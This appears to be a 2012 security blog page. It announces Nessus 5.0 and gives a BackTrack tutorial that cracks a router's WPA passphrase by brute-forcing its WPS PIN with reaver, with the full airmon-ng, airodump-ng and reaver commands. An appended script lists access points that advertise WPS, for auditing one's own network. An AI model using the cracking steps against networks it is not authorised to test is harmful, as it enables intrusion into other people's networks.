Thursday, 16 February 2012

Nessus 5.0 Released


Nessus 5.0 introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:

Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.

Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as vulnerability publication date, public vulnerability database ID, information assurance vulnerability alert (IAVA), and more, makes it simple to identify easily-exploitable vulnerabilities.

Industry-leading efficiency – Real-time scan results combined with on-the-fly filtering allow users to quickly see risk level and act upon vulnerability data without waiting for the scan to complete. One-click navigation makes it easy to jump from critical vulnerability to vulnerable host to the details of the vulnerability. Five severity levels quickly separate informational data from actionable results.

Fully customizable reports – Multiple filters, results management, and new pre-configured report formats allow users to produce targeted reports tailored to fit the needs/interests of executives, systems administrators, and auditors. Users can also combine multiple report templates into a single, comprehensive report, which can be delivered in a variety of formats, including PDF.

“Tenable’s dynamic library of now nearly 50,000 individual vulnerability and configuration checks is updated continuously to ensure the accuracy and relevance of Nessus scans and audits. Our next-generation scanner continues to be recognized by security professionals, network penetration testing teams, and auditors as the de facto standard for vulnerability and configuration assessment,” said Ron Gula, CEO and CTO of Tenable Network Security. “Version 5.0 builds on the solid foundation Nessus has established for quality and accuracy, and now makes it easier and faster to install and use.”

download and info :

Sunday, 8 January 2012

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introduced to allow home users with little or no knowledge of wireless security to set up a wireless network encrypted with WPA or WPA2, and to make it easy to add new devices to an existing network without entering long passwords/passphrases.


In this example I will be using BackTrack 5 R1 Gnome 32 bit.

You can either boot off the DVD or install it. Creating a bootable DVD and installing BackTrack are beyond the scope of this tutorial.

I'm assuming you have two network connections: one for internet access and one with the wireless adapter that we will be using in this test. In my case I'm using both a wired and a wireless adapter.
Open up a terminal and run the following commands:

apt-get update
apt-get install reaver


Next we need to find out what interface is assigned to your wireless card using the following command.


iwconfig


In my case wlan0.
Next we need to put the wireless card into monitor mode.


airmon-ng start wlan0


The monitor interface created is mon0.
Next we need to find the BSSID of the test router we want to crack.


airodump-ng wlan0


In my case 00:11:22:33:44:55.
Next we launch reaver.


reaver -i mon0 -b 00:11:22:33:44:55 -vv


Now sit back and wait, grab a cup or two of coffee, and let reaver do its thing. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my case it took just over 2 hours.
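Since the attack only works against routers that still answer WPS requests, the useful check on your own network is whether an access point advertises WPS at all. The script below is an added example, not part of the original tutorial: it filters the text printed by `iw dev <interface> scan` and lists every BSS that carries a WPS element, marking those that report "AP setup locked". The function names, the extra BSSIDs and the sample scan text are constructed, and the field layout is assumed to match iw's usual output.

```shell
#!/bin/sh
# Added example: list access points that advertise WPS, from `iw` scan text.
# Live use (assumed interface name): iw dev wlan0 scan | wps_audit

# Reads scan text on stdin; prints "BSSID SSID STATUS" for each BSS with a
# WPS element. STATUS is "locked" if the AP reports setup locked, else "open".
wps_audit() {
    awk '
        function emit() {
            if (bssid != "" && wps)
                print bssid, ssid, (locked ? "locked" : "open")
        }
        /^BSS [0-9A-Fa-f:]+/ {            # a new BSS record starts here
            emit()
            bssid = substr($2, 1, 17); ssid = "<hidden>"; wps = 0; locked = 0
            next
        }
        /^[ \t]*SSID: / {
            sub(/^[ \t]*SSID: /, "")
            if ($0 != "") ssid = $0
            next
        }
        /^[ \t]*WPS:/            { wps = 1 }
        /AP setup locked: 0x01/  { locked = 1 }
        END { emit() }
    '
}

# Constructed sample input (not captured from a real network).
sample_scan() {
    cat <<'EOF'
BSS 00:11:22:33:44:55(on wlan0)
    SSID: testnet
    WPS:     * Version: 1.0
             * Wi-Fi Protected Setup State: 2 (Configured)
BSS 66:77:88:99:aa:bb(on wlan0)
    SSID: lab-locked
    WPS:     * Version: 1.0
             * AP setup locked: 0x01
BSS cc:dd:ee:ff:00:11(on wlan0)
    SSID: no-wps
    RSN:     * Version: 1
EOF
}

sample_scan | wps_audit
```

Any access point listed as "open" is a candidate for having WPS switched off in the router's admin interface; one that never appears in the list is not advertising WPS.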